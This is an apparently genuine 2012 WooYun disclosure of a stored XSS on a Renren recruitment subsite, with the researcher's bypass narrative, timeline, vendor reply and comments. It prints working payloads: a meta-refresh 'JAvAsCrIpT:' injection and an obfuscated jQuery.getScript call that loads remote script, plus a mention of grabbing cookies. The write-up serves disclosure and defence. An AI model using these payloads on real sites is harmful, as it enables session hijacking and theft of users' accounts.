当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-014825

漏洞标题:人人网某分站存储型XSS

相关厂商:人人网

漏洞作者: Drizzle.Risk

提交时间:2012-11-15 23:29

修复时间:2012-12-30 23:30

公开时间:2012-12-30 23:30

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-11-15: 细节已通知厂商并且等待厂商处理中
2012-11-16: 厂商已经确认,细节仅向厂商公开
2012-11-26: 细节向核心白帽子及相关领域专家公开
2012-12-06: 细节向普通白帽子公开
2012-12-16: 细节向实习白帽子公开
2012-12-30: 细节向公众公开

简要描述:

过滤不严导致XSS...

详细说明:

本来是去找工作的,谁知道顺便挖出来个XSS..-_-
开始先测试各种标签..发现过滤器基于白名单,input,img木有过滤...
然后发现<input type="submit" />会侧漏.. 过滤器弱爆了...

1.jpg


2.jpg


3.jpg


在这个地方测试了一些时间,发先不好利用,然后突然发现个好玩的东东..

4.jpg


测试中发现不能闭合,不过滤<和",但是过滤>

5.jpg


接着从Refresh入手...
观察观察

6.jpg


自己的content被和谐了...

7.jpg


想办法用他的content,分开写就OK了..

8.jpg


猥琐的过滤器,冒号被换成中文的了...
经过测试,在别的地方,冒号不会被替换...
目测是javascript的问题..

改为JAvAsCrIpT:


成功跨...过滤器弱爆了...

9成功跨.jpg


继续调用外部js,有字数限制..

11字数限制.jpg


目测支持JQuery..试试

//http://127.0.0.1/1.js
0;url=JAvAsCrIpT:jQuery.getScript(String.fromCharCode(104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,49,46,106,115))" http-equiv="Refresh"


12远程JS.jpg


OK了... 顺便用JQ清空代码...

13顺便清空漏出的代码.jpg


哦对了,cookie:

cookie.jpg


Over

漏洞证明:

http://xiaozhao.renren.com/careerguide/edit
发帖然后改包..改成如下即可

0;url=JAvAsCrIpT:alert(Drizzle.Risk)" http-equiv="Refresh"


现在找工作都先问乌云ID.. 赶紧申请个...第一次发帖.. 写的详细点.. -_-

修复方案:

@人人网,你懂的..

版权声明:转载请注明来源 Drizzle.Risk@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2012-11-16 09:56

厂商回复:

感谢!

最新状态:

暂无

漏洞评价:

评论

  1. 2012-11-15 23:35 | Drizzle.Risk ( 普通白帽子 | Rank:255 漏洞数:19 | You have an error in your SQL syntax; ch...)

    利用代码少了单引号... -_-

  2. 2012-11-16 00:16 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    自己顶自己啊?辛苦~~

  3. 2012-12-17 11:30 | 鉴澈 ( 路人 | Rank:8 漏洞数:2 | 搞搞软基,搞搞硬基,基基复鸡鸡)

    话说洞主找到工作没

  4. 2012-12-21 17:50 | Drizzle.Risk ( 普通白帽子 | Rank:255 漏洞数:19 | You have an error in your SQL syntax; ch...)

    @鉴澈 找到了... ;-)

  5. 2013-01-04 21:48 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    在哪工作了?待遇如何

  6. 2013-01-05 00:42 | 猴子 ( 路人 | Rank:19 漏洞数:5 | 我是一只骚猴子)

    @Drizzle.Risk 在哪呢

  7. 2013-01-09 10:59 | Drizzle.Risk ( 普通白帽子 | Rank:255 漏洞数:19 | You have an error in your SQL syntax; ch...)

    @猴子 某公司...扫地... -_-

  8. 2013-01-09 11:00 | Drizzle.Risk ( 普通白帽子 | Rank:255 漏洞数:19 | You have an error in your SQL syntax; ch...)

    @px1624 呃,某公司.. 0.0

  9. 2013-04-27 11:31 | Drizzle.Risk ( 普通白帽子 | Rank:255 漏洞数:19 | You have an error in your SQL syntax; ch...)

    @xsser 漏洞确认了但却没有补,怎么破..